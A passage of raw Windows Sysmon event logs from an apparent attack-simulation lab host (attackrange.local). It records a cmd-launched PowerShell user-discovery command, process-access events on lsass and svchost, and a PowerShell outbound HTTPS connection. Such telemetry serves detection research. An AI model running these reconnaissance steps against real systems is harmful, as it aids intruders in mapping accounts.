Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E0BDE506901E67B32EBA72A6785258EC,SHA256=025C4D07F04BDC7576E9225FDB286ABA2D750785A03B8FC0AF3CD414332E413F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718F6B33793B4C1B91A5F173F60E5DA3,SHA256=D074A410D4ECF3F132439BF0041610ACD0F8201BF9CF71FC1176D237878BF22D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:04.294{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50638-false10.0.1.12-8089- 23542300x800000000000000036498352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.227{B81B27B7-A1DD-6140-A856-04000000C801}5460ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.158{B81B27B7-4013-611D-1600-00000000C801}11962844C:\Windows\system32\svchost.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.158{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.124{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.124{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000036498347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-14 13:21:33.089{B81B27B7-A1DD-6140-A856-04000000C801}5460\PSHost.132760992930137387.5460.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000036498346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.089{B81B27B7-A1DD-6140-A856-04000000C801}5460ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_ernoalt5.xuz.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.089{B81B27B7-A1DD-6140-A856-04000000C801}5460ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_dzvmnvt1.nph.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000036498344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.073{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_dzvmnvt1.nph.ps12021-09-14 13:21:33.073 10341000x800000000000000036498343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.058{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-6639-6125-B100-01000000C801}65365024C:\Windows\system32\conhost.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-A1DD-6140-A756-04000000C801}56001380C:\Windows\system32\cmd.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.013{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe [System.Security.Principal.WindowsIdentity]::GetCurrent()C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\System32\cmd.execmd.exe /c powershell.exe [System.Security.Principal.WindowsIdentity]::GetCurrent() 10341000x800000000000000036498334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-6639-6125-B100-01000000C801}65365024C:\Windows\system32\conhost.exe{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-6638-6125-B000-01000000C801}12085068C:\Windows\system32\cmd.exe{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd.exe /c powershell.exe [System.Security.Principal.WindowsIdentity]::GetCurrent()C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x800000000000000036498358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.841{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB8F15A604CD52200B2A82BDC741F69A,SHA256=1EDCA3C1D88A818BF63E4AB5E4BBE9D20CB03947655F31C9933782634AB31A6C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.089{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0AF606ED09844BEF635FCC05EF6D5AA8,SHA256=C8659DDAB4AD16FCFDB16615A7F1AB3C0F2F5C093A6034FD8ED6B4B6E0D46EFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A85439F54F27DC0107460570C92A8448,SHA256=B660E0D78B78A6F5583164246BA3904142F9EDE43F54499A89099F79DF27AAC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.023{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8DA91D6C86124874F723211835DD855,SHA256=CF1BA510F84C136DA1AD0E27E8A9657E99CDFF9F2344227D44E0EE381AB15E56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:35.856{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDF8CFF9B3C3A69754A93520F49433B3,SHA256=B4AC069D3CD1E5FCBB3F1C76483E62EE849A687D77EF1DC77F90A1C368DD68FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:36.871{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B074C88D53CE3FD4532DB44CEB9215AB,SHA256=5A8DDDE6537D6AC75E0220CA60B67144740451B0E040808DD9F48330077ACA9B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:36.371{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=08A3A821B500653DF39110245BF94589,SHA256=8221E188F924D78BBD354CCC40162E885F62EB0CFB60316654D83EB621C9F95C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.759{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50640-false10.0.1.12-8000- 354300x800000000000000036498372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:06.976{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50639-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036498371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.954{B81B27B7-A1E1-6140-A956-04000000C801}67002464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program 